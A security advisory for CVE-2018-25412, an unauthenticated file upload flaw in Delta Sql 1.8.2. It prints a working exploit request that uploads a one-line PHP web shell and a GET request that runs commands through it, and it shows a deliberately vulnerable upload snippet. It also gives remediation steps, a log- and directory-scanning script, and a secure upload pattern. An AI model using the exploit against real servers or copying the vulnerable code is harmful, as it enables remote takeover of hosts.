CVE-2018-25412: Arbitrary File Upload in Delta Sql 1.8.2
A critical arbitrary file upload vulnerability originally discovered in 2018 has been formally assigned CVE-2018-25412 and catalogued in NVD with a CVSS score of 9.8 (Critical). The flaw affects Delta Sql version 1.8.2, a PHP-based SQL administration tool.
The vulnerability allows unauthenticated attackers to upload arbitrary files — including PHP web shells — by sending crafted POST requests to the docs_upload.php endpoint. Once uploaded, these files can be executed by the web server, resulting in remote code execution (RCE) with the privileges of the web server process.
Vulnerability Overview
| Attribute | Value |
|---|---|
| CVE ID | CVE-2018-25412 |
| CVSS Score | 9.8 (Critical) |
| CWE Classification | CWE-434 — Unrestricted Upload of File with Dangerous Type |
| Affected Software | Delta Sql 1.8.2 |
| Attack Vector | Network |
| Authentication Required | None (unauthenticated) |
| NVD Published | May 30, 2026 |
| Original Flaw Discovery | 2018 |
Technical Details
The vulnerability exists in docs_upload.php, which processes multipart form data for file uploads without validating the file type, extension, or content. An unauthenticated attacker can send a crafted POST request with a malicious PHP file disguised as a document upload.
Example attack vector (Host and Content-Length headers omitted for brevity; the blank lines are part of the multipart framing):
POST /docs_upload.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----Boundary

------Boundary
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/octet-stream

<?php system($_GET['cmd']); ?>
------Boundary--
After upload, the PHP file is accessible in the upload directory and can be executed directly:
GET /upload/shell.php?cmd=whoami
Successful exploitation allows an attacker to:
- Execute arbitrary commands on the server with web server privileges
- Read sensitive files including database credentials, configuration files, and source code
- Establish persistent access by planting additional web shells or backdoors
- Pivot to internal network resources accessible from the compromised server
- Escalate privileges if local privilege escalation vulnerabilities are also present
Context and Impact
Delta Sql is a PHP-based database management interface primarily used by developers and administrators as a lightweight alternative to phpMyAdmin. Version 1.8.2 is a legacy release and is unlikely to be widely deployed in production environments in 2026. The late NVD publication of this 2018 vulnerability reflects ongoing efforts to formally catalogue legacy security flaws.
Who is affected:
- Self-hosted Delta Sql 1.8.2 installations exposed to the internet
- Development environments running outdated Delta Sql instances
- Any web hosting environments where Delta Sql 1.8.2 was bundled with web applications
Practical risk: The CVSS 9.8 score reflects an unauthenticated, network-exploitable flaw of low attack complexity whose impact is full compromise of the host. Any public-facing Delta Sql 1.8.2 installation whose docs_upload.php endpoint is reachable should be treated as already compromised until the upload directory and web server logs have been checked.
Remediation
- Upgrade or decommission — update Delta Sql to a patched version or replace with a maintained database administration tool such as phpMyAdmin or Adminer
- Restrict network access — place database administration interfaces behind VPN or IP allowlisting; these tools should never be internet-facing
- Validate file uploads — any custom fork should enforce a strict allowlist of permitted extensions, verify the actual file content rather than the client-supplied Content-Type, store uploads under server-generated names outside the web root (or with script execution disabled for that directory), and require authentication on the upload endpoint
- Scan for existing shells — audit the upload directory for any existing PHP files that may have been placed by prior exploitation
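Two of the steps above, correlating the post-upload request pattern from the Technical Details section in the access log and auditing the upload directory for planted shells, can be run as one script. The following is an added example, not code from the advisory or from Delta Sql; it assumes the upload directory is served at /upload/ (the path the advisory's example uses) and that the web server writes Combined Log Format access logs. The log lines and files it runs on are constructed here for the demonstration.

```python
"""Hunt for exploitation of the docs_upload.php upload flaw.

Added example, not code from the advisory or from Delta Sql. Assumes the
upload directory is served at /upload/ and Combined Log Format access logs.
The log lines and files below are constructed for the demonstration.
"""
import os
import re
import shutil
import tempfile

UPLOAD_ENDPOINT = "/docs_upload.php"
UPLOAD_DIR_URL = "/upload/"  # assumption: URL prefix of the upload directory
# Extensions a typical mod_php / php-fpm setup hands to the interpreter.
PHP_EXTS = {".php", ".phtml", ".php3", ".php4", ".php5", ".php7", ".phps", ".phar"}
PHP_EXT_NAMES = {e.lstrip(".") for e in PHP_EXTS}
# Match <?php and <?= only; a bare "<?" would also hit XML prologues.
PHP_TAG_RE = re.compile(rb"<\?(?:php\b|=)")
# Combined Log Format: ip ident user [ts] "METHOD PATH PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r"(?P<status>\d{3}) \S+"
)


def find_shell_requests(log_lines):
    """One record per request for a PHP-extension file under the upload directory.
    uploaded_first tells whether that client POSTed to docs_upload.php earlier in
    the log, which ties the shell request to the upload that planted it."""
    posted = set()
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        path = rec["path"].split("?", 1)[0]  # drop ?cmd=... before checking the extension
        if rec["method"] == "POST" and path.endswith(UPLOAD_ENDPOINT):
            posted.add(rec["ip"])
        elif path.startswith(UPLOAD_DIR_URL) and os.path.splitext(path)[1].lower() in PHP_EXTS:
            hits.append({"ip": rec["ip"], "ts": rec["ts"], "request": rec["path"],
                         "uploaded_first": rec["ip"] in posted})
    return hits


def scan_upload_dir(directory):
    """Flag files by a PHP extension, by a PHP extension hidden inside the name
    (shell.php.txt, which AddHandler-style Apache configs may still execute), and
    by PHP open tags in the content (e.g. a GIF with PHP appended)."""
    findings = []
    for root, _dirs, files in os.walk(directory):
        for name in files:
            full = os.path.join(root, name)
            lower = name.lower()
            reasons = []
            if os.path.splitext(lower)[1] in PHP_EXTS:
                reasons.append("php extension")
            elif PHP_EXT_NAMES.intersection(lower.split(".")[1:-1]):
                reasons.append("php extension inside the name")
            with open(full, "rb") as fh:
                data = fh.read(2 * 1024 * 1024)  # cap at 2 MiB; raise it for large uploads
            if PHP_TAG_RE.search(data):
                reasons.append("php open tag in content")
            if reasons:
                findings.append((os.path.relpath(full, directory), reasons))
    return sorted(findings)


# Constructed log: one client uploads then calls the shell, one uploads a
# legitimate document, one calls an already planted shell without uploading.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Jun/2026:10:14:02 +0000] "GET /index.php HTTP/1.1" 200 4532 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [12/Jun/2026:10:14:09 +0000] "POST /docs_upload.php HTTP/1.1" 200 221 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [12/Jun/2026:10:14:11 +0000] "GET /upload/shell.php?cmd=whoami HTTP/1.1" 200 18 "-" "curl/8.0"',
    '198.51.100.4 - - [12/Jun/2026:10:20:33 +0000] "POST /docs_upload.php HTTP/1.1" 200 221 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [12/Jun/2026:10:20:40 +0000] "GET /upload/quarterly.pdf HTTP/1.1" 200 90211 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [12/Jun/2026:11:02:00 +0000] "GET /upload/shell.php?cmd=id HTTP/1.1" 200 40 "-" "python-requests/2.31"',
]
# Constructed upload directory: two benign documents, an obvious .php, a double
# extension, and a GIF/PHP polyglot that passes an extension-only allowlist.
SAMPLE_FILES = {
    "quarterly.pdf": b"%PDF-1.4\n%constructed placeholder\n",
    "notes.txt": b"meeting notes\n",
    "shell.php": b"<?php /* constructed placeholder body */ ?>\n",
    "shell.php.txt": b"<?php /* constructed placeholder body */ ?>\n",
    "image.gif": b"GIF89a" + b"\x00" * 16 + b"<?php /* constructed placeholder body */ ?>\n",
}


def demo():
    """Run both checks over the constructed data; returns (log_hits, dir_findings)."""
    tmp = tempfile.mkdtemp(prefix="deltasql_upload_")
    try:
        for name, content in SAMPLE_FILES.items():
            with open(os.path.join(tmp, name), "wb") as fh:
                fh.write(content)
        return find_shell_requests(SAMPLE_LOG), scan_upload_dir(tmp)
    finally:
        shutil.rmtree(tmp)


if __name__ == "__main__":
    hits, findings = demo()
    for h in hits:
        print("shell request:", h)
    for path, reasons in findings:
        print("suspicious file:", path, "|", ", ".join(reasons))
```

Against a real host, feed `find_shell_requests` the access log lines and `scan_upload_dir` the on-disk upload directory; a request flagged with `uploaded_first` false means the shell was planted earlier than the log window or by a client the log no longer shows, so widen the search rather than dismiss it.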
Secure upload pattern:
// Vulnerable pattern: trusts the client-supplied name, so shell.php is written as-is
move_uploaded_file($_FILES['file']['tmp_name'], 'uploads/' . $_FILES['file']['name']);

// Secure pattern: extension allowlist plus a server-generated name
$allowed = ['pdf', 'doc', 'txt'];
if (!isset($_FILES['file']) || $_FILES['file']['error'] !== UPLOAD_ERR_OK) {
    die('Upload failed');
}
$ext = strtolower(pathinfo($_FILES['file']['name'], PATHINFO_EXTENSION));
if (!in_array($ext, $allowed, true)) {
    die('File type not permitted');
}
// Never reuse the client's filename: it can smuggle a second extension (shell.php.txt)
// or path separators. Keep uploads/ outside the web root, or disable PHP execution
// for that directory (Apache with mod_php: php_admin_flag engine off).
$dest = 'uploads/' . bin2hex(random_bytes(16)) . '.' . $ext;
move_uploaded_file($_FILES['file']['tmp_name'], $dest);
Key Takeaways
- CVE-2018-25412 is a CVSS 9.8 Critical arbitrary file upload flaw in Delta Sql 1.8.2, now formally catalogued in NVD
- No authentication required — any attacker with network access to the endpoint can upload and execute PHP files
- Full RCE — successful exploitation gives command execution with web server privileges
- Remediation: Upgrade to a patched version, restrict network access, or decommission the installation